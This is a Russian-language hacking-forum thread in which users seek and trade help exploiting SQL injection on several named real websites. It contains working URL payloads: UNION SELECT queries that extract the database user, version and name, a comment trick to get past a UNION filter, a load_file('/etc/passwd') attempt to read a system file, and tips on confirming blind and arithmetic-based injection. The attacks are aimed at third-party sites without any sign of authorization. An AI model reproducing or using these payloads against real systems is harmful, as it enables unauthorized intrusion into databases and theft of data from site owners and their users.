А с чего ты это взял, что это "уязвимость" ?. Прочитай ошибку. Code: Notice: failed to build language-file ut.login in /home/shared/include/XmlLanguageParser/1/XmlLanguageParser.class.php on line 103
Проверьте: PHP: select count(hash) from table_name Где hash - имя откуда у вас ничего "не выводится" Если вывело "0", то нету записей.
помогите раскрутить скуль, стоит фильтрация на юнион через name_const не выходит http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714%20order%20by%209%20--
http://www.thebartend.com/drinks/ShotsShooters/R.php?id=5714+and+1=0+union(select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9)+--+
вот более простой способ: http://www.thebartend.com/drinks/ShotsShooters/R.php?id=-5714+/*!UNION*/+SELECT+VERSION(),2,3,4,5,6,7,8,9--
Здесь есть SQL-inj? http://www.vedicbooks.net/advanced_search_result.php?inc_subcat=1&keywords=Roy%20Eugene%20Davis&search_in_description=1'
http://kommok.ru/index.php Подскажите как здесь провести инъекцию.Метод POST,инъекция типа Blind,уязвимые параметры и в форме поиска ,и в форме голосования,по крайней мере так определил Acunetix Web Scanner Я пока еще не очень дружу с Blind Sql,а тут плюс к этому еще и POST метод,что не добавляет удобства
Тут есть скуль ? http://sochi.com/pages/?id=-400+union+select+load_file('/etc/passwd')+from+mysql.user+-- По идее : http://sochi.com/pages/?id=400 А с "-" выдаёт другой результат. http://sochi.com/pages/?id=-400
BuG_4F, ты не правильно понял мысль. проверяй, выполняется ли арифметическое действие, например ?id=400-1 , если появляется содержимое, которое должно появится при id=399, то можно говорить о иньекции.